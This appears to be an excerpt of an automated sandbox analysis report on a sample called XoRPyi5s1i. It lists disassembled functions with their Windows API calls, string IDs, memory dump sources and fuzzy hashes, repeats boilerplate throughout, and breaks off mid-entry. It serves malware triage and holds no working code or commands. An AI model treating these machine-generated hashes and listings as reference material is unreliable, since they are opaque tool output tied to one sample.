                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0016B9DE
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: 671bf91c1db5df5f782617ebfb34b5afbc16c1dc4c07fbe4454bb7b4dae8951a
                                    • Instruction ID: c1903a9bb7fb84b6c914f1ad974da41167cadb2da3976f093c6a643ad2231b09
                                    • Opcode Fuzzy Hash: 671bf91c1db5df5f782617ebfb34b5afbc16c1dc4c07fbe4454bb7b4dae8951a
                                    • Instruction Fuzzy Hash: FF21C8B4A00104BFDB08ABA4DC95EFEBB75EF55300F100115F951A32D1EB745865DF60
                                    Function 0016B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0016BA73
                                    • GetDlgCtrlID.USER32 ref: 0016BA7E
                                    • GetParent.USER32 ref: 0016BA9A
                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0016BA9D
                                    • GetDlgCtrlID.USER32(?), ref: 0016BAA6
                                    • GetParent.USER32(?), ref: 0016BAC2
                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0016BAC5
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$CtrlParent
                                    • String ID: ComboBox$ListBox
                                    • API String ID: 1383977212-1403004172
                                    • Opcode ID: ae9d394ff807748df6b0ffa0c0d3bfb080563d278b6b2635bbb4bb0c19744909
                                    • Instruction ID: 49833b3fbfecb13b9de37342d0fb4e65d3258d9b953a40898b4d9bbb89b8e86f
                                    • Opcode Fuzzy Hash: ae9d394ff807748df6b0ffa0c0d3bfb080563d278b6b2635bbb4bb0c19744909
                                    • Instruction Fuzzy Hash: 2021C2B4A00108BFDB04ABA4DC85EFEBB79EF55300F100119F951A3191EB7559699F60
                                    Function 0016BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetParent.USER32 ref: 0016BAE3
                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 0016BAF8
                                    • _wcscmp.LIBCMT ref: 0016BB0A
                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0016BB85
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ClassMessageNameParentSend_wcscmp
                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                    • API String ID: 1704125052-3381328864
                                    • Opcode ID: fdca317828dbedd493f38757f1489751d012f8740fe87d50c99286b5e45513c8
                                    • Instruction ID: 651cdac3726b99d28acb4e20f72b58cab2c80a824c16729ba6bbb3c08502fcd4
                                    • Opcode Fuzzy Hash: fdca317828dbedd493f38757f1489751d012f8740fe87d50c99286b5e45513c8
                                    • Instruction Fuzzy Hash: D011593660C343FEFA296631EC17DAA379D8B65320B200032FD14E54D5FFB168E04514
                                    Function 0018B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • VariantInit.OLEAUT32(?), ref: 0018B2D5
                                    • CoInitialize.OLE32(00000000), ref: 0018B302
                                    • CoUninitialize.COMBASE ref: 0018B30C
                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 0018B40C
                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 0018B539
                                    • CoGetInstanceFromFile.COMBASE(00000000,?,00000000,00000015,00000002), ref: 0018B56D
                                    • CoGetObject.OLE32(?,00000000,001BD91C,?), ref: 0018B590
                                    • SetErrorMode.KERNEL32(00000000), ref: 0018B5A3
                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0018B623
                                    • VariantClear.OLEAUT32(001BD91C), ref: 0018B633
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                    • String ID:
                                    • API String ID: 2395222682-0
                                    • Opcode ID: 325335ddc4a29709bab32559219fc9ec6667cb5938385c8337679f1d0bb99670
                                    • Instruction ID: 1808f4c8e09bec24f21cf6e2113f9a0728754ebe522d3765417a1aaec46cf2d6
                                    • Opcode Fuzzy Hash: 325335ddc4a29709bab32559219fc9ec6667cb5938385c8337679f1d0bb99670
                                    • Instruction Fuzzy Hash: 1DC10271608305AFC704EF68D88596BB7E9BF89308F00495DF98A9B251DB71EE05CF92
                                    Function 0015ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                    Download Yara Rule
                                    APIs
                                    • __lock.LIBCMT ref: 0015ACC1
                                      • Part of subcall function 00157CF4: __mtinitlocknum.LIBCMT ref: 00157D06
                                      • Part of subcall function 00157CF4: RtlEnterCriticalSection.NTDLL(00000000), ref: 00157D1F
                                    • __calloc_crt.LIBCMT ref: 0015ACD2
                                      • Part of subcall function 00156986: __calloc_impl.LIBCMT ref: 00156995
                                      • Part of subcall function 00156986: Sleep.KERNEL32(00000000,000003BC,0014F507,?,0000000E), ref: 001569AC
                                    • @_EH4_CallFilterFunc@8.LIBCMT ref: 0015ACED
                                    • GetStartupInfoW.KERNEL32(?,001E6E28,00000064,00155E91,001E6C70,00000014), ref: 0015AD46
                                    • __calloc_crt.LIBCMT ref: 0015AD91
                                    • GetFileType.KERNEL32(00000001), ref: 0015ADD8
                                    • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0015AE11
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                    • String ID:
                                    • API String ID: 1426640281-0
                                    • Opcode ID: 4d46f61cf222d396080309530af9bd154fa16871d1944639c1fbf87f62c11e7f
                                    • Instruction ID: 75f33a8ca0dc7d5aa6acf2adf94498655ce276486214a6d5127f8ccbbc298921
                                    • Opcode Fuzzy Hash: 4d46f61cf222d396080309530af9bd154fa16871d1944639c1fbf87f62c11e7f
                                    • Instruction Fuzzy Hash: 8A81CFB0945245CFDB14CF68C8415ADBBF0AF09326BA4435ED8B6AF3D1D7349846CB52
                                    Function 001767E9 Relevance: 15.1, APIs: 10, Instructions: 107windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • __swprintf.LIBCMT ref: 001767FD
                                    • __swprintf.LIBCMT ref: 0017680A
                                      • Part of subcall function 0015172B: __woutput_l.LIBCMT ref: 00151784
                                    • FindResourceW.KERNEL32(?,?,0000000E), ref: 00176834
                                    • LoadResource.KERNEL32(?,00000000), ref: 00176840
                                    • LockResource.KERNEL32(00000000), ref: 0017684D
                                    • FindResourceW.KERNEL32(?,?,00000003), ref: 0017686D
                                    • LoadResource.KERNEL32(?,00000000), ref: 0017687F
                                    • SizeofResource.KERNEL32(?,00000000), ref: 0017688E
                                    • LockResource.KERNEL32(?), ref: 0017689A
                                    • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 001768F9
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                    • String ID:
                                    • API String ID: 1433390588-0
                                    • Opcode ID: 6f1fa0534eeb4502e2e1074d9dec0600e1fc4c3591614da7b3fc976bd5f22198
                                    • Instruction ID: c9d289226f8041742e13148807c442cbb07d987e2d3d0df1e0db33bf4d93f1fa
                                    • Opcode Fuzzy Hash: 6f1fa0534eeb4502e2e1074d9dec0600e1fc4c3591614da7b3fc976bd5f22198
                                    • Instruction Fuzzy Hash: AE31BE71A0065AAFDB159FA1ED48EBF7BB8EF08341F008525F916E6140E730D991DBB1
                                    Function 00174025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetCurrentThreadId.KERNEL32 ref: 00174047
                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,001730A5,?,00000001), ref: 0017405B
                                    • GetWindowThreadProcessId.USER32(00000000), ref: 00174062
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001730A5,?,00000001), ref: 00174071
                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 00174083
                                    • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,001730A5,?,00000001), ref: 0017409C
                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,001730A5,?,00000001), ref: 001740AE
                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,001730A5,?,00000001), ref: 001740F3
                                    • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,001730A5,?,00000001), ref: 00174108
                                    • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,001730A5,?,00000001), ref: 00174113
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                    • String ID:
                                    • API String ID: 2156557900-0
                                    • Opcode ID: bf97cb3ccaf85916d26fa33ec5b7d91ff244d2b5b4fcc35970f965fc77cbc8b3
                                    • Instruction ID: b3195d45fb6b50a83bace168318cdc4066de75d497a8dd2305d36db6a02aea1e
                                    • Opcode Fuzzy Hash: bf97cb3ccaf85916d26fa33ec5b7d91ff244d2b5b4fcc35970f965fc77cbc8b3
                                    • Instruction Fuzzy Hash: B8319375500204AFDB14EF64EC85BB977B9BB54311F12C106F918E6690EBB4A9C0CF60
                                    Function 0016CB82 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 239COMMON
                                    Download Yara Rule
                                    APIs
                                    • EnumChildWindows.USER32(?,0016CF50), ref: 0016CE90
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: ChildEnumWindows
                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                    • API String ID: 3555792229-1603158881
                                    • Opcode ID: 2779404608163c1899176c6261b2381a88dc531cb62409bfc6da69178442d79e
                                    • Instruction ID: 4e4c925aef6b6e57e9d0f97b317060a01e2139372bb24a9236945f50dcc826bf
                                    • Opcode Fuzzy Hash: 2779404608163c1899176c6261b2381a88dc531cb62409bfc6da69178442d79e
                                    • Instruction Fuzzy Hash: AB918130A00646ABCB18DFA0C891BFEFBB5BF14340F508529E899A7151DF716969DBE0
                                    Function 00133093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                    Download Yara Rule
                                    APIs
                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 001330DC
                                    • CoUninitialize.COMBASE ref: 00133181
                                    • UnregisterHotKey.USER32(?), ref: 001332A9
                                    • DestroyWindow.USER32(?), ref: 001A5079
                                    • FreeLibrary.KERNEL32(?), ref: 001A50F8
                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 001A5125
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                    • String ID: close all
                                    • API String ID: 469580280-3243417748
                                    • Opcode ID: 7955a248e79c806cbb459ae033b505f691bdcbe505d7985ae9bc83fb75171ad7
                                    • Instruction ID: 5520e3ff18236cbdd799fa8808ae636800bb44d24f558c3fac265210b920fef3
                                    • Opcode Fuzzy Hash: 7955a248e79c806cbb459ae033b505f691bdcbe505d7985ae9bc83fb75171ad7
                                    • Instruction Fuzzy Hash: 86913974600202CFC709EF24C999A69F3B4FF25304F5482A9F51AA7262DB30AE56CF58
                                    Function 0014CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SetWindowLongW.USER32(?,000000EB), ref: 0014CC15
                                      • Part of subcall function 0014CCCD: GetClientRect.USER32(?,?), ref: 0014CCF6
                                      • Part of subcall function 0014CCCD: GetWindowRect.USER32(?,?), ref: 0014CD37
                                      • Part of subcall function 0014CCCD: ScreenToClient.USER32(?,?), ref: 0014CD5F
                                    • GetDC.USER32 ref: 001AD137
                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 001AD14A
                                    • SelectObject.GDI32(00000000,00000000), ref: 001AD158
                                    • SelectObject.GDI32(00000000,00000000), ref: 001AD16D
                                    • ReleaseDC.USER32(?,00000000), ref: 001AD175
                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 001AD200
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                    • String ID: U
                                    • API String ID: 4009187628-3372436214
                                    • Opcode ID: d42508d231f7ec5fd3b887ccb675810b6530df5adedee9c900861f9f165e2d90
                                    • Instruction ID: a22d99e88b216d5bb0afff1060e1ff42fed051e22d52b6a345f303142a635bfa
                                    • Opcode Fuzzy Hash: d42508d231f7ec5fd3b887ccb675810b6530df5adedee9c900861f9f165e2d90
                                    • Instruction Fuzzy Hash: 8871F138400605DFCF25DF64E881AFA3BB1FF5A360F14426AFD569A6A6D7318881DF90
                                    Function 00199A75 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 142windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00199B19
                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 00199B2D
                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00199B47
                                    • _wcscat.LIBCMT ref: 00199BA2
                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 00199BB9
                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00199BE7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: MessageSend$Window_wcscat
                                    • String ID: -----$SysListView32
                                    • API String ID: 307300125-3975388722
                                    • Opcode ID: 9e741475bd35719b0501797ab64c7f924bc2ede6e1f24f56a3a469b876341dfb
                                    • Instruction ID: 97ae6bfc60e9d05e8486216ac5b460012e8baf64cce8f6aded9c780f17cf0ac0
                                    • Opcode Fuzzy Hash: 9e741475bd35719b0501797ab64c7f924bc2ede6e1f24f56a3a469b876341dfb
                                    • Instruction Fuzzy Hash: B0418D71900348ABDF219FA8DC85FEE77A8EB08350F10456AF949A7291D7B59D84CB60
                                    Function 001845C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 001845FF
                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0018462B
                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0018466D
                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00184682
                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0018468F
                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 001846BF
                                    • InternetCloseHandle.WININET(00000000), ref: 00184706
                                      • Part of subcall function 00185052: GetLastError.KERNEL32(?,?,001843CC,00000000,00000000,00000001), ref: 00185067
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                    • String ID:
                                    • API String ID: 1241431887-3916222277
                                    • Opcode ID: 6966e3411987ab28bef6c4230e5ad77c69aa32b1bd7134ca08ee0d3629686288
                                    • Instruction ID: 63db34b31010ce8e4fb019a1e4c46874c02f1d5cb166d382aab56595926f1865
                                    • Opcode Fuzzy Hash: 6966e3411987ab28bef6c4230e5ad77c69aa32b1bd7134ca08ee0d3629686288
                                    • Instruction Fuzzy Hash: 33416DB150120ABFEB16AF50DC89FFB77ACFF09354F104126FA159A141EBB49A448BA4
                                    Function 0018B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,001CDC00), ref: 0018B715
                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,001CDC00), ref: 0018B749
                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0018B8C1
                                    • SysFreeString.OLEAUT32(?), ref: 0018B8EB
                                    Memory Dump Source
                                    • Source File: 00000001.00000002.1612508746.0000000000131000.00000040.00000001.01000000.00000003.sdmp, Offset: 00130000, based on PE: true
                                    • Associated: 00000001.00000002.1612302892.0000000000130000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001DE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001EA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.00000000001FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612508746.0000000000234000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612944867.000000000023A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000001.00000002.1612979621.000000000023C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_1_2_130000_XoRPyi5s1i.jbxd
                                    Similarity
                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                    • String ID:
                                    • API String ID: 560350794-0
                                    • Opcode ID: 31108cd5749f4f0f443b5d4ccc8602c4ff79804ba97170ff082a73b80218035a
                                    • Instruction ID: 1c77eae97284afb4e7598c572baf8b8c5787d18dbfe1ed264ec0a8d1b4243d9c
